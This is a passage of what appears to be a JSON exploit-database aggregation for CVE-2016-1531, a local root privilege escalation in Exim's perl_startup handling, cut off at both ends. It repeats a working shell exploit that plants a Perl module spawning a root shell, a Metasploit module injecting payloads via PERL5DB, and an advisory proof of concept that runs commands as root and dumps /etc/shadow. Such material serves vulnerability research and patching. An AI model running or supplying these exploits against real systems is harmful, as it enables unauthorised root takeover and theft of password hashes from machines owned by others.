BUSINESS IMPACT\r\n-------------------------\r\n \r\nThis vulnerability could be exploited by attackers who have local access to the\r\nsystem to escalate their privileges to root which would allow them to fully\r\ncompromise the system.\r\n \r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n \r\nExim versions before the latest patched version of Exim 4.86.2 are affected by \r\nthis vulnerability, if Exim was compiled with Perl support and the main \r\nconfiguration file (i.e /etc/exim/exim.conf or /etc/exim4/exim.conf), contains \r\na perl_startup option e.g:\r\n \r\nperl_startup = do '/usr/share/exim4/exigrey.pl'\r\n \r\nIt is important to note that the file does not necessarily have to exist\r\nto exploit the vulnerability. Although the path must be specified.\r\n \r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n \r\nUpdate to Exim 4.86.2 which contains the official patch that fixes the\r\nenvironment sanitization issues.\r\n \r\nIX. REFERENCES\r\n-------------------------\r\n \r\nhttp://legalhackers.com/advisories/Exim-Local-Root-Privilege-Escalation.txt\r\nhttp://www.exim.org/\r\nhttp://www.exim.org/static/doc/CVE-2016-1531.txt\r\nhttp://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html\r\nhttps://github.com/Exim/exim/commit/29f9808015576a9a1f391f4c6b80c7c606a4d99f\r\n \r\nCVE-2016-1531\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1531\r\n \r\nX. ADVISORY CREATED BY\r\n-------------------------\r\n \r\nThis advisory has been created by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\nlegalhackers.com\r\n \r\nXI. REVISION HISTORY\r\n-------------------------\r\n \r\nMarch 10th, 2016: Advisory released\r\nMarch 11th, 2016: Fixed advisory header,added cve.mitre link of the root issue\r\n \r\nXII. LEGAL NOTICES\r\n-------------------------\r\n \r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.\n\n# 0day.today [2018-03-10] #", "sourceHref": "https://0day.today/exploit/25544", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-19T23:32:21", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2016-03-09T00:00:00", "type": "zdt", "title": "Exim 4.84-3 - Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-09T00:00:00", "id": "1337DAY-ID-25543", "href": "https://0day.today/exploit/description/25543", "sourceData": "#!/bin/sh\r\n# CVE-2016-1531 exim <= 4.84-3 local root exploit\r\n# ===============================================\r\n# you can write files as root or force a perl module to\r\n# load by manipulating the perl environment and running\r\n# exim with the \"perl_startup\" arguement -ps. \r\n#\r\n# e.g.\r\n# [[email\u00a0protected] tmp]$ ./cve-2016-1531.sh \r\n# [ CVE-2016-1531 local root exploit\r\n# sh-4.3# id\r\n# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)\r\n# \r\n# -- Hacker Fantastic \r\necho [ CVE-2016-1531 local root exploit\r\ncat > /tmp/root.pm << EOF\r\npackage root;\r\nuse strict;\r\nuse warnings;\r\n \r\nsystem(\"/bin/sh\");\r\nEOF\r\nPERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps\n\n# 0day.today [2018-02-19] #", "sourceHref": "https://0day.today/exploit/25543", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-19T02:01:44", "description": "Exploit for linux platform in category local exploits", "cvss3": {}, "published": "2016-04-15T00:00:00", "type": "zdt", "title": "Exim - 'perl_startup' Privilege Escalation (Metasploit)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2016-04-15T00:00:00", "id": "1337DAY-ID-25565", "href": "https://0day.today/exploit/description/25565", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Local\r\n \r\n Rank = ExcellentRanking\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exim \"perl_startup\" Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a Perl injection vulnerability in Exim < 4.86.2\r\n given the presence of the \"perl_startup\" configuration parameter.\r\n },\r\n 'Author' => [\r\n 'Dawid Golunski', # Vulnerability discovery\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n %w{CVE 2016-1531},\r\n %w{EDB 39549},\r\n %w{URL http://www.exim.org/static/doc/CVE-2016-1531.txt}\r\n ],\r\n 'DisclosureDate' => 'Mar 10 2016',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'SessionTypes' => %w{shell meterpreter},\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'BadChars' => \"\\x22\\x27\", # \" and '\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd cmd_bash',\r\n 'RequiredCmd' => 'generic netcat netcat-e bash-tcp telnet'\r\n }\r\n },\r\n 'Targets' => [\r\n ['Exim < 4.86.2', {}]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n end\r\n \r\n def check\r\n if exploit('whoami') == 'root'\r\n CheckCode::Vulnerable\r\n else\r\n CheckCode::Safe\r\n end\r\n end\r\n \r\n def exploit(c = payload.encoded)\r\n # PERL5DB technique from http://perldoc.perl.org/perlrun.html\r\n cmd_exec(%Q{PERL5OPT=-d PERL5DB='exec \"#{c}\"' exim -ps 2>&-})\r\n end\r\n \r\nend\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/25565", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:29", "description": "", "cvss3": {}, "published": "2016-03-08T00:00:00", "type": "packetstorm", "title": "Exim 4.84-3 Local Root / Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-08T00:00:00", "id": "PACKETSTORM:136124", "href": "https://packetstormsecurity.com/files/136124/Exim-4.84-3-Local-Root-Privilege-Escalation.html", "sourceData": "`#!/bin/sh \n# CVE-2016-1531 exim <= 4.84-3 local root exploit \n# =============================================== \n# you can write files as root or force a perl module to \n# load by manipulating the perl environment and running \n# exim with the \"perl_startup\" arguement -ps. \n# \n# e.g. \n# [fantastic@localhost tmp]$ ./cve-2016-1531.sh \n# [ CVE-2016-1531 local root exploit \n# sh-4.3# id \n# uid=0(root) gid=1000(fantastic) groups=1000(fantastic) \n# \n# -- Hacker Fantastic \necho [ CVE-2016-1531 local root exploit \ncat > /tmp/root.pm << EOF \npackage root; \nuse strict; \nuse warnings; \n \nsystem(\"/bin/sh\"); \nEOF \nPERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/136124/exim-escalate.txt", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:22:05", "description": "", "cvss3": {}, "published": "2016-03-10T00:00:00", "type": "packetstorm", "title": "Exim Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-10T00:00:00", "id": "PACKETSTORM:136165", "href": "https://packetstormsecurity.com/files/136165/Exim-Local-Privilege-Escalation.html", "sourceData": "`============================================= \n- Advisory release date: 10.03.2016 \n- Created by: Dawid Golunski \n- Severity: High/Critical \n============================================= \n \n \nI. VULNERABILITY \n------------------------- \n \nExim < 4.86.2 Local Root Privilege Escalation Exploit \n \n \nII. BACKGROUND \n------------------------- \n \n\"Exim is a message transfer agent (MTA) developed at the University of \nCambridge for use on Unix systems connected to the Internet. It is freely \navailable under the terms of the GNU General Public Licence. In style it is \nsimilar to Smail 3, but its facilities are more general. There is a great \ndeal of flexibility in the way mail can be routed, and there are extensive \nfacilities for checking incoming mail. Exim can be installed in place of \nSendmail, although the configuration of Exim is quite different.\" \n \nhttp://www.exim.org/ \n \n \nIII. INTRODUCTION \n------------------------- \n \nWhen Exim installation has been compiled with Perl support and contains a \nperl_startup configuration variable it can be exploited by malicious local \nattackers to gain root privileges. \n \nIV. DESCRIPTION \n------------------------- \n \nThe vulnerability stems from Exim in versions below 4.86.2 not performing \nsanitization of the environment before loading a perl script defined \nwith perl_startup setting in exim config. \n \nperl_startup is usually used to load various helper scripts such as \nmail filters, gray listing scripts, mail virus scanners etc. \n \nFor the option to be supported, exim must have been compiled with Perl \nsupport, which can be verified with: \n \n[dawid@centos7 ~]$ exim -bV -v | grep i Perl \nSupport for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL \nContent_Scanning DKIM Old_Demime PRDR OCSP \n \n \nTo perform the attack, attacker can take advantage of the exim's sendmail \ninterface which links to an exim binary that has an SUID bit set on it by \ndefault as we can see below: \n \n[dawid@centos7 ~]$ ls -l /usr/sbin/sendmail.exim \nlrwxrwxrwx. 1 root root 4 Nov 30 00:45 /usr/sbin/sendmail.exim -> exim \n \n[dawid@centos7 ~]$ ls -l /usr/sbin/exim \n-rwsr-xr-x. 1 root root 1222416 Dec 7 2015 /usr/sbin/exim \n \n \nNormally, when exim sendmail interface starts up, it drops its root \nprivileges before giving control to the user (i.e entering mail contents for \nsending etc), however an attacker can make use of the following command line \nparameter which is available to all users: \n \n-ps This option applies when an embedded Perl interpreter is linked with \nExim. It overrides the setting of the perl_at_start option, forcing the \nstarting of the interpreter to occur as soon as Exim is started. \n \n \nAs we can see from the documentation at: \n \nhttp://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html \n \nthe perl_at_start option does the following: \n \n\"Setting perl_at_start (a boolean option) in the configuration requests a \nstartup when Exim is entered.\" \n \nTherefore it is possible to force the execution of the perl_startup script \ndefined in the Exim's main config before exim drops its root privileges. \n \n \nTo exploit this setting and gain the effective root privilege of the SUID binary, \nattackers can inject PERL5OPT perl environment variable, which does not get \ncleaned by affected versions of Exim. \n \nAs per perl documentation, the environment variable allows to set perl command-line \noptions (switches). Switches in this variable are treated as if they were on every \nPerl command line. \n \nThere are several interesting perl switches that that could be set by attackers to \ntrigger code execution. \nOne of these is -d switch which forces perl to enter an interactive debug mode \nin which it is possible to take control of the perl application. \n \nAn example proof of concept exploit using the -d switch can be found below. \n \n \nV. PROOF OF CONCEPT ROOT EXPLOIT \n------------------------- \n \n[dawid@centos7 ~]$ head /etc/exim/exim.conf \n###################################################################### \n# Runtime configuration file for Exim # \n###################################################################### \n \n# Custom filtering via perl \nperl_startup = do '/usr/share/exim4/exigrey.pl' \n \n[dawid@centos7 ~]$ exim -bV -v | grep -i Perl \nSupport for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL Content_Scanning DKIM Old_Demime PRDR OCSP \n \n[dawid@centos7 ~]$ PERL5OPT=\"-d/dev/null\" /usr/sbin/sendmail.exim -ps victim@localhost \n \nLoading DB routines from perl5db.pl version 1.37 \nEditor support available. \n \nEnter h or 'h h' for help, or 'man perldebug' for more help. \n \nDebugged program terminated. Use q to quit or R to restart, \nuse o inhibit_exit to avoid stopping after program termination, \nh q, h R or h o to get additional info. \n \nDB<1> p system(\"id\"); \nuid=0(root) gid=10(wheel) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 \n0 \nDB<2> p system(\"head /etc/shadow\"); \nroot:$5$afgjO3wQeqHpAYF7$TmL0[...]AYAAvbA:16682:0:99999:7::: \nbin:*:16372:0:99999:7::: \ndaemon:*:16372:0:99999:7:: \n[...] \n \n \nVI. BUSINESS IMPACT \n------------------------- \n \nThis vulnerability could be exploited by attackers who have local access to the \nsystem to escalate their privileges to root which would allow them to fully \ncompromise the system. \n \nVII. SYSTEMS AFFECTED \n------------------------- \n \nExim versions before the latest patched version of Exim 4.86.2 are affected by \nthis vulnerability, if Exim was compiled with Perl support and the main \nconfiguration file (i.e /etc/exim/exim.conf or /etc/exim4/exim.conf), contains \na perl_startup option e.g: \n \nperl_startup = do '/usr/share/exim4/exigrey.pl' \n \nIt is important to note that the file does not necessarily have to exist \nto exploit the vulnerability. Although the path must be specified. \n \n \nVIII. SOLUTION \n------------------------- \n \nUpdate to Exim 4.86.2 which contains the official patch that fixes the \nenvironment sanitization issues. \n \nIX. REFERENCES \n------------------------- \n \nhttp://legalhackers.com/advisories/Exim-Local-Root-Privilege-Escalation.txt \nhttp://www.exim.org/ \nhttp://www.exim.org/static/doc/CVE-2016-1531.txt \nhttp://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html \nhttps://github.com/Exim/exim/commit/29f9808015576a9a1f391f4c6b80c7c606a4d99f \n \nCVE-2016-1531 \nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1531 \n \nX. ADVISORY CREATED BY \n------------------------- \n \nThis advisory has been created by Dawid Golunski \ndawid (at) legalhackers (dot) com \nlegalhackers.com \n \nXI. REVISION HISTORY \n------------------------- \n \nMarch 10th, 2016: Advisory released \nMarch 11th, 2016: Fixed advisory header,added cve.mitre link of the root issue \n \nXII. LEGAL NOTICES \n------------------------- \n \nThe information contained within this advisory is supplied \"as-is\" with \nno warranties or guarantees of fitness of use or otherwise. I accept no \nresponsibility for any damage caused by the use or misuse of this information. \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/136165/Exim-Local-Root-Privilege-Escalation.txt", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:16:17", "description": "", "cvss3": {}, "published": "2016-04-14T00:00:00", "type": "packetstorm", "title": "Exim perl_startup Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2016-04-14T00:00:00", "id": "PACKETSTORM:136694", "href": "https://packetstormsecurity.com/files/136694/Exim-perl_startup-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \n \nRank = ExcellentRanking \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Exim \"perl_startup\" Privilege Escalation', \n'Description' => %q{ \nThis module exploits a Perl injection vulnerability in Exim < 4.86.2 \ngiven the presence of the \"perl_startup\" configuration parameter. \n}, \n'Author' => [ \n'Dawid Golunski', # Vulnerability discovery \n'wvu' # Metasploit module \n], \n'References' => [ \n%w{CVE 2016-1531}, \n%w{EDB 39549}, \n%w{URL http://www.exim.org/static/doc/CVE-2016-1531.txt} \n], \n'DisclosureDate' => 'Mar 10 2016', \n'License' => MSF_LICENSE, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'SessionTypes' => %w{shell meterpreter}, \n'Privileged' => true, \n'Payload' => { \n'BadChars' => \"\\x22\\x27\", # \" and ' \n'Compat' => { \n'PayloadType' => 'cmd cmd_bash', \n'RequiredCmd' => 'generic netcat netcat-e bash-tcp telnet' \n} \n}, \n'Targets' => [ \n['Exim < 4.86.2', {}] \n], \n'DefaultTarget' => 0 \n)) \nend \n \ndef check \nif exploit('whoami') == 'root' \nCheckCode::Vulnerable \nelse \nCheckCode::Safe \nend \nend \n \ndef exploit(c = payload.encoded) \n# PERL5DB technique from http://perldoc.perl.org/perlrun.html \ncmd_exec(%Q{PERL5OPT=-d PERL5DB='exec \"#{c}\"' exim -ps 2>&-}) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/136694/exim_perl_startup.rb.txt", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2023-02-09T10:08:07", "description": "This module exploits a Perl injection vulnerability in Exim < 4.86.2 given the presence of the \"perl_startup\" configuration parameter.\n", "cvss3": {}, "published": "2016-04-13T22:51:20", "type": "metasploit", "title": "Exim \"perl_startup\" Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2023-02-05T04:45:30", "id": "MSF:EXPLOIT-UNIX-LOCAL-EXIM_PERL_STARTUP-", "href": "https://www.rapid7.com/db/modules/exploit/unix/local/exim_perl_startup/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Exim \"perl_startup\" Privilege Escalation',\n 'Description' => %q{\n This module exploits a Perl injection vulnerability in Exim < 4.86.2\n given the presence of the \"perl_startup\" configuration parameter.\n },\n 'Author' => [\n 'Dawid Golunski', # Vulnerability discovery\n 'wvu' # Metasploit module\n ],\n 'References' => [\n %w[CVE 2016-1531],\n %w[EDB 39549],\n %w[URL http://www.exim.org/static/doc/CVE-2016-1531.txt]\n ],\n 'DisclosureDate' => '2016-03-10',\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'SessionTypes' => %w[shell meterpreter],\n 'Privileged' => true,\n 'Payload' => {\n 'BadChars' => \"\\x22\\x27\" # \" and '\n },\n 'Targets' => [\n ['Exim < 4.86.2', {}]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Reliability' => [REPEATABLE_SESSION],\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => []\n }\n )\n )\n end\n\n def check\n if exploit('whoami') == 'root'\n CheckCode::Vulnerable\n else\n CheckCode::Safe\n end\n end\n\n def exploit(cmd = payload.encoded)\n # PERL5DB technique from http://perldoc.perl.org/perlrun.html\n cmd_exec(%(PERL5OPT=-d PERL5DB='exec \"#{cmd}\"' exim -ps 2>&-))\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/local/exim_perl_startup.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2023-12-06T15:58:18", "description": "", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-03-10T00:00:00", "type": "exploitdb", "title": "Exim < 4.86.2 - Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2016-1531", "CVE-2016-1531"], "modified": "2016-03-10T00:00:00", "id": "EDB-ID:39549", "href": "https://www.exploit-db.com/exploits/39549", "sourceData": "=============================================\r\n- Advisory release date: 10.03.2016\r\n- Created by: Dawid Golunski\r\n- Severity: High/Critical\r\n=============================================\r\n\r\n\r\nI. VULNERABILITY\r\n-------------------------\r\n\r\nExim < 4.86.2 Local Root Privilege Escalation Exploit\r\n\r\n\r\nII. BACKGROUND\r\n-------------------------\r\n\r\n\"Exim is a message transfer agent (MTA) developed at the University of \r\nCambridge for use on Unix systems connected to the Internet. It is freely \r\navailable under the terms of the GNU General Public Licence. In style it is \r\nsimilar to Smail 3, but its facilities are more general. There is a great \r\ndeal of flexibility in the way mail can be routed, and there are extensive \r\nfacilities for checking incoming mail. Exim can be installed in place of \r\nSendmail, although the configuration of Exim is quite different.\"\r\n\r\nhttp://www.exim.org/\r\n\r\n\r\nIII. INTRODUCTION\r\n-------------------------\r\n\r\nWhen Exim installation has been compiled with Perl support and contains a \r\nperl_startup configuration variable it can be exploited by malicious local \r\nattackers to gain root privileges.\r\n\r\nIV. DESCRIPTION\r\n-------------------------\r\n\r\nThe vulnerability stems from Exim in versions below 4.86.2 not performing \r\nsanitization of the environment before loading a perl script defined\r\nwith perl_startup setting in exim config.\r\n\r\nperl_startup is usually used to load various helper scripts such as\r\nmail filters, gray listing scripts, mail virus scanners etc.\r\n\r\nFor the option to be supported, exim must have been compiled with Perl \r\nsupport, which can be verified with:\r\n\r\n[dawid@centos7 ~]$ exim -bV -v | grep i Perl\r\nSupport for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL\r\nContent_Scanning DKIM Old_Demime PRDR OCSP\r\n\r\n\r\nTo perform the attack, attacker can take advantage of the exim's sendmail \r\ninterface which links to an exim binary that has an SUID bit set on it by \r\ndefault as we can see below:\r\n\r\n[dawid@centos7 ~]$ ls -l /usr/sbin/sendmail.exim \r\nlrwxrwxrwx. 1 root root 4 Nov 30 00:45 /usr/sbin/sendmail.exim -> exim\r\n\r\n[dawid@centos7 ~]$ ls -l /usr/sbin/exim\r\n-rwsr-xr-x. 1 root root 1222416 Dec 7 2015 /usr/sbin/exim\r\n\r\n\r\nNormally, when exim sendmail interface starts up, it drops its root\r\nprivileges before giving control to the user (i.e entering mail contents for\r\nsending etc), however an attacker can make use of the following command line \r\nparameter which is available to all users:\r\n\r\n-ps This option applies when an embedded Perl interpreter is linked with \r\n Exim. It overrides the setting of the perl_at_start option, forcing the \r\n starting of the interpreter to occur as soon as Exim is started.\r\n\r\n\r\nAs we can see from the documentation at:\r\n\r\nhttp://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html\r\n\r\nthe perl_at_start option does the following:\r\n\r\n\"Setting perl_at_start (a boolean option) in the configuration requests a \r\nstartup when Exim is entered.\"\r\n\r\nTherefore it is possible to force the execution of the perl_startup script\r\ndefined in the Exim's main config before exim drops its root privileges.\r\n\r\n\r\nTo exploit this setting and gain the effective root privilege of the SUID binary,\r\nattackers can inject PERL5OPT perl environment variable, which does not get\r\ncleaned by affected versions of Exim.\r\n\r\nAs per perl documentation, the environment variable allows to set perl command-line \r\noptions (switches). Switches in this variable are treated as if they were on every\r\nPerl command line. \r\n\r\nThere are several interesting perl switches that that could be set by attackers to \r\ntrigger code execution. \r\nOne of these is -d switch which forces perl to enter an interactive debug mode \r\nin which it is possible to take control of the perl application.\r\n\r\nAn example proof of concept exploit using the -d switch can be found below.\r\n\r\n\r\nV. PROOF OF CONCEPT ROOT EXPLOIT\r\n-------------------------\r\n\r\n[dawid@centos7 ~]$ head /etc/exim/exim.conf \r\n######################################################################\r\n# Runtime configuration file for Exim #\r\n######################################################################\r\n\r\n# Custom filtering via perl\r\nperl_startup = do '/usr/share/exim4/exigrey.pl'\r\n\r\n[dawid@centos7 ~]$ exim -bV -v | grep -i Perl\r\nSupport for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL Content_Scanning DKIM Old_Demime PRDR OCSP\r\n\r\n[dawid@centos7 ~]$ PERL5OPT=\"-d/dev/null\" /usr/sbin/sendmail.exim -ps victim@localhost\r\n\r\nLoading DB routines from perl5db.pl version 1.37\r\nEditor support available.\r\n\r\nEnter h or 'h h' for help, or 'man perldebug' for more help.\r\n\r\nDebugged program terminated. Use q to quit or R to restart,\r\n use o inhibit_exit to avoid stopping after program termination,\r\n h q, h R or h o to get additional info. \r\n\r\n DB<1> p system(\"id\");\r\nuid=0(root) gid=10(wheel) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\r\n0\r\n DB<2> p system(\"head /etc/shadow\");\r\nroot:$5$afgjO3wQeqHpAYF7$TmL0[...]AYAAvbA:16682:0:99999:7:::\r\nbin:*:16372:0:99999:7:::\r\ndaemon:*:16372:0:99999:7::\r\n[...]\r\n\r\n\r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n\r\nThis vulnerability could be exploited by attackers who have local access to the\r\nsystem to escalate their privileges to root which would allow them to fully\r\ncompromise the system.\r\n\r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n\r\nExim versions before the latest patched version of Exim 4.86.2 are affected by \r\nthis vulnerability, if Exim was compiled with Perl support and the main \r\nconfiguration file (i.e /etc/exim/exim.conf or /etc/exim4/exim.conf), contains \r\na perl_startup option e.g:\r\n\r\nperl_startup = do '/usr/share/exim4/exigrey.pl'\r\n\r\nIt is important to note that the file does not necessarily have to exist\r\nto exploit the vulnerability. Although the path must be specified.\r\n\r\n\r\nVIII. SOLUTION\r\n-------------------------\r\n\r\nUpdate to Exim 4.86.2 which contains the official patch that fixes the\r\nenvironment sanitization issues.\r\n\r\nIX. REFERENCES\r\n-------------------------\r\n\r\nhttp://legalhackers.com/advisories/Exim-Local-Root-Privilege-Escalation.txt\r\nhttp://www.exim.org/\r\nhttp://www.exim.org/static/doc/CVE-2016-1531.txt\r\nhttp://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html\r\nhttps://github.com/Exim/exim/commit/29f9808015576a9a1f391f4c6b80c7c606a4d99f\r\n\r\nCVE-2016-1531\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1531\r\n\r\nX. ADVISORY CREATED BY\r\n-------------------------\r\n\r\nThis advisory has been created by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\nlegalhackers.com\r\n\r\nXI. REVISION HISTORY\r\n-------------------------\r\n\r\nMarch 10th, 2016: Advisory released\r\nMarch 11th, 2016: Fixed advisory header,added cve.mitre link of the root issue\r\n\r\nXII. LEGAL NOTICES\r\n-------------------------\r\n\r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.", "sourceHref": "https://www.exploit-db.com/raw/39549", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-08T11:09:59", "description": "", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-03-09T00:00:00", "type": "exploitdb", "title": "Exim 4.84-3 - Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2016-1531", "CVE-2016-1531"], "modified": "2016-03-09T00:00:00", "id": "EDB-ID:39535", "href": "https://www.exploit-db.com/exploits/39535", "sourceData": "#!/bin/sh\r\n# CVE-2016-1531 exim <= 4.84-3 local root exploit\r\n# ===============================================\r\n# you can write files as root or force a perl module to\r\n# load by manipulating the perl environment and running\r\n# exim with the \"perl_startup\" arguement -ps. \r\n#\r\n# e.g.\r\n# [fantastic@localhost tmp]$ ./cve-2016-1531.sh \r\n# [ CVE-2016-1531 local root exploit\r\n# sh-4.3# id\r\n# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)\r\n# \r\n# -- Hacker Fantastic \r\necho [ CVE-2016-1531 local root exploit\r\ncat > /tmp/root.pm << EOF\r\npackage root;\r\nuse strict;\r\nuse warnings;\r\n\r\nsystem(\"/bin/sh\");\r\nEOF\r\nPERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps", "sourceHref": "https://www.exploit-db.com/raw/39535", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T15:58:00", "description": "", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-15T00:00:00", "type": "exploitdb", "title": "Exim - 'perl_startup' Local Privilege Escalation (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": 